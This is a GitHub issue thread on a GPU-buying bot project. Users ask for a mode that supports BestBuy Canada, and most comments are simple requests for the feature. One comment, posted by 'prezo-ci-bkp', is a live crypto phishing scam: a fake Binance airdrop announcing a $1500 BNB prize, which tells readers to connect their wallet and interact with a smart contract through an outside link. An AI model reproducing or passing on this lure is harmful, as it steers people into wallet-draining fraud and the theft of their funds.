### ISSUE TITLE
Create a flag that can switch mode for BestBuy Canada

### ISSUE THREAD

**Issue by kkapuria3** [kkapuria3/BestBuy-GPU-Bot#3]
I will start working on this if there is enough interest

**Comment by XLuma** [comment]
Please do !

**Comment by fasombi** [comment]
Yes, please do this!

**Comment by fasombi** [comment]
Yes, please do this! Have a couple of people I know who would want this done as well.

**Comment by newguy1122** [comment]
Please implement this feature, would be the first if not the only working one available !

**Comment by kkapuria3** [comment]
It looks like this will have to wait until after Halloween !

**Comment by Archaicc** [comment]
> It looks like this will have to wait until after Halloween !

Did you ever got a chance to look at this?  It feels with so low quantities of items in Canada the bots are getting mostly everything.

**Comment by benjaminmesser** [comment]
I would make use of this feature as well!

**Comment by g1ng3r585** [comment]
We are 80 in my field of study (computer science) and most are trying to create a bot to buy gpu, but we are only at the beginning of our career and we are lacking in knowledge.  You would be of great help to us!

**Comment by prezo-ci-bkp** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by KedarWolf** [comment]
A Canada version of your bot would be great. I don't think in the code just changing the URL from bestbuy.com to bestbuy.ca will work. :(
